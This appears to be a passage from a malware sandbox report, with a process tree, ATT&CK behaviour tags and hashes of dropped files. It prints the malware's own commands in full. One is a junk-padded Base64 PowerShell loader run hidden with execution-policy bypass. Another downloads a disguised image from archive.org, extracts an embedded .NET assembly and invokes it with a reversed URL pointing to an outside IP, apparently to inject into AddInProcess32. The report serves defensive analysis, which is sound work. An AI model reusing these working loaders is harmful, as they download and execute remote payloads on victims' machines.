∨ ☦ ⧳ ⇷CQ⫣ ∨ ☦ ⧳ ⇷YgBh⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷ZQ⫣ ∨ ☦ ⧳ ⇷2⫣ ∨ ☦ ⧳ ⇷DQ⫣ ∨ ☦ ⧳ ⇷QwBv⫣ ∨ ☦ ⧳ ⇷G0⫣ ∨ ☦ ⧳ ⇷bQBh⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷p⫣ ∨ ☦ ⧳ ⇷Ds⫣ ∨ ☦ ⧳ ⇷J⫣ ∨ ☦ ⧳ ⇷Bs⫣ ∨ ☦ ⧳ ⇷G8⫣ ∨ ☦ ⧳ ⇷YQBk⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷BB⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷cwBl⫣ ∨ ☦ ⧳ ⇷G0⫣ ∨ ☦ ⧳ ⇷YgBs⫣ ∨ ☦ ⧳ ⇷Hk⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷9⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷WwBT⫣ ∨ ☦ ⧳ ⇷Hk⫣ ∨ ☦ ⧳ ⇷cwB0⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷bQ⫣ ∨ ☦ ⧳ ⇷u⫣ ∨ ☦ ⧳ ⇷FI⫣ ∨ ☦ ⧳ ⇷ZQBm⫣ ∨ ☦ ⧳ ⇷Gw⫣ ∨ ☦ ⧳ ⇷ZQBj⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷aQBv⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷LgBB⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷cwBl⫣ ∨ ☦ ⧳ ⇷G0⫣ ∨ ☦ ⧳ ⇷YgBs⫣ ∨ ☦ ⧳ ⇷Hk⫣ ∨ ☦ ⧳ ⇷XQ⫣ ∨ ☦ ⧳ ⇷6⫣ ∨ ☦ ⧳ ⇷Do⫣ ∨ ☦ ⧳ ⇷T⫣ ∨ ☦ ⧳ ⇷Bv⫣ ∨ ☦ ⧳ ⇷GE⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷o⫣ ∨ ☦ ⧳ ⇷CQ⫣ ∨ ☦ ⧳ ⇷YwBv⫣ ∨ ☦ ⧳ ⇷G0⫣ ∨ ☦ ⧳ ⇷bQBh⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷BC⫣ ∨ ☦ ⧳ ⇷Hk⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷Bl⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷KQ⫣ ∨ ☦ ⧳ ⇷7⫣ ∨ ☦ ⧳ ⇷CQ⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷B5⫣ ∨ ☦ ⧳ ⇷H⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷ZQ⫣ ∨ ☦ ⧳ ⇷g⫣ ∨ ☦ ⧳ ⇷D0⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷k⫣ ∨ ☦ ⧳ ⇷Gw⫣ ∨ ☦ ⧳ ⇷bwBh⫣ ∨ ☦ ⧳ ⇷GQ⫣ ∨ ☦ ⧳ ⇷ZQBk⫣ ∨ ☦ ⧳ ⇷EE⫣ ∨ ☦ ⧳ ⇷cwBz⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷bQBi⫣ ∨ ☦ ⧳ ⇷Gw⫣ ∨ ☦ ⧳ ⇷eQ⫣ ∨ ☦ ⧳ ⇷u⫣ ∨ ☦ ⧳ ⇷Ec⫣ ∨ ☦ ⧳ ⇷ZQB0⫣ ∨ ☦ ⧳ ⇷FQ⫣ ∨ ☦ ⧳ ⇷eQBw⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷K⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷n⫣ ∨ ☦ ⧳ ⇷GQ⫣ ∨ ☦ ⧳ ⇷bgBs⫣ ∨ ☦ ⧳ ⇷Gk⫣ ∨ ☦ ⧳ ⇷Yg⫣ ∨ ☦ ⧳ ⇷u⫣ ∨ ☦ ⧳ ⇷Ek⫣ ∨ ☦ ⧳ ⇷Tw⫣ ∨ ☦ ⧳ ⇷u⫣ ∨ ☦ ⧳ ⇷Eg⫣ ∨ ☦ ⧳ ⇷bwBt⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷Jw⫣ ∨ ☦ ⧳ ⇷p⫣ ∨ ☦ ⧳ ⇷Ds⫣ ∨ ☦ ⧳ ⇷J⫣ ∨ ☦ ⧳ ⇷Bt⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷Bo⫣ ∨ ☦ ⧳ ⇷G8⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷g⫣ ∨ ☦ ⧳ ⇷D0⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷k⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷eQBw⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷LgBH⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷BN⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷Bo⫣ ∨ ☦ ⧳ ⇷G8⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷o⫣ ∨ ☦ ⧳ ⇷Cc⫣ ∨ ☦ ⧳ ⇷VgBB⫣ ∨ ☦ ⧳ ⇷Ek⫣ ∨ ☦ ⧳ ⇷Jw⫣ ∨ ☦ ⧳ ⇷p⫣ ∨ ☦ ⧳ ⇷C4⫣ ∨ ☦ ⧳ ⇷SQBu⫣ ∨ ☦ ⧳ ⇷HY⫣ ∨ ☦ ⧳ ⇷bwBr⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷K⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷k⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷dQBs⫣ ∨ ☦ ⧳ ⇷Gw⫣ ∨ ☦ ⧳ ⇷L⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷g⫣ ∨ ☦ ⧳ ⇷Fs⫣ ∨ ☦ ⧳ ⇷bwBi⫣ ∨ ☦ ⧳ ⇷Go⫣ ∨ ☦ ⧳ ⇷ZQBj⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷WwBd⫣ ∨ ☦ ⧳ ⇷F0⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷o⫣ ∨ ☦ ⧳ ⇷Cc⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷B4⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷Lg⫣ ∨ ☦ ⧳ ⇷0⫣ ∨ ☦ ⧳ ⇷DQ⫣ ∨ ☦ ⧳ ⇷N⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷2⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷YQBi⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷bwB0⫣ ∨ ☦ ⧳ ⇷Gk⫣ ∨ ☦ ⧳ ⇷dQBx⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷Lw⫣ ∨ ☦ ⧳ ⇷2⫣ ∨ ☦ ⧳ ⇷DQ⫣ ∨ ☦ ⧳ ⇷MQ⫣ ∨ ☦ ⧳ ⇷u⫣ ∨ ☦ ⧳ ⇷Dk⫣ ∨ ☦ ⧳ ⇷Mg⫣ ∨ ☦ ⧳ ⇷y⫣ ∨ ☦ ⧳ ⇷C4⫣ ∨ ☦ ⧳ ⇷NQ⫣ ∨ ☦ ⧳ ⇷3⫣ ∨ ☦ ⧳ ⇷DE⫣ ∨ ☦ ⧳ ⇷Lg⫣ ∨ ☦ ⧳ ⇷3⫣ ∨ ☦ ⧳ ⇷D⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷MQ⫣ ∨ ☦ ⧳ ⇷v⫣ ∨ ☦ ⧳ ⇷C8⫣ ∨ ☦ ⧳ ⇷OgBw⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷Bo⫣ ∨ ☦ ⧳ ⇷Cc⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷s⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷JwBk⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷cwBh⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷aQB2⫣ ∨ ☦ ⧳ ⇷GE⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷Bv⫣ ∨ ☦ ⧳ ⇷Cc⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷s⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷JwBk⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷cwBh⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷aQB2⫣ ∨ ☦ ⧳ ⇷GE⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷Bv⫣ ∨ ☦ ⧳ ⇷Cc⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷s⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷JwBk⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷cwBh⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷aQB2⫣ ∨ ☦ ⧳ ⇷GE⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷Bv⫣ ∨ ☦ ⧳ ⇷Cc⫣ ∨ ☦ ⧳ ⇷L⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷n⫣ ∨ ☦ ⧳ ⇷EE⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷Bk⫣ ∨ ☦ ⧳ ⇷Ek⫣ ∨ ☦ ⧳ ⇷bgBQ⫣ ∨ ☦ ⧳ ⇷HI⫣ ∨ ☦ ⧳ ⇷bwBj⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷cwBz⫣ ∨ ☦ ⧳ ⇷DM⫣ ∨ ☦ ⧳ ⇷Mg⫣ ∨ ☦ ⧳ ⇷n⫣ ∨ ☦ ⧳ ⇷Cw⫣ ∨ ☦ ⧳ ⇷Jw⫣ ∨ ☦ ⧳ ⇷n⫣ ∨ ☦ ⧳ ⇷Ck⫣ ∨ ☦ ⧳ ⇷KQ⫣ ∨ ☦ ⧳ ⇷=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⫣ ∨ ☦ ⧳ ⇷','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2612
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.4446sabsotiuqe/641.922.571.701//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2624

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    2b4e8ca71d2170751fb7b1cf88dd7c39

    SHA1

    4cd05c8333b5ec03f439b39cd972a6b7f71562ed

    SHA256

    6036060404b77ed19f5c481d500a5c7e0ded30403287464e8b9f2450d323ae3a

    SHA512

    d28afbbcaf6885946136facbb6e889dc20895a5df227932e925752d2d944d5ded7525d78b83896c711d71acda0da85271901141e50230ed824c8a2dc70dcb373

    Download Submit

  • C:\Users\Admin\AppData\Roaming\equitosxxmenacegirlfriend.vbs
    Filesize

    703KB

    MD5

    2315bcb53ea540318897164afb4c7845

    SHA1

    dbeb67bc40212c16971a0611884b4aa9ac297488

    SHA256

    aa61b5de1809b37b5d3d2a841195e16b79f31ac0416c5cfe73aab8a717449889

    SHA512

    4853936b368ff7183031ccc83c6eef84c9ed6daed734dd62959b04a7b63ab6071b9bfd8575617f93669f83d9042d09f63bd9e4313c3178b945bc144b7d0b2b1b

    Download Submit

  • memory/848-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/848-1-0x00000000724AD000-0x00000000724B8000-memory.dmp

    Filesize

    44KB

    Download

  • memory/848-16-0x00000000724AD000-0x00000000724B8000-memory.dmp

    Filesize

    44KB

    Download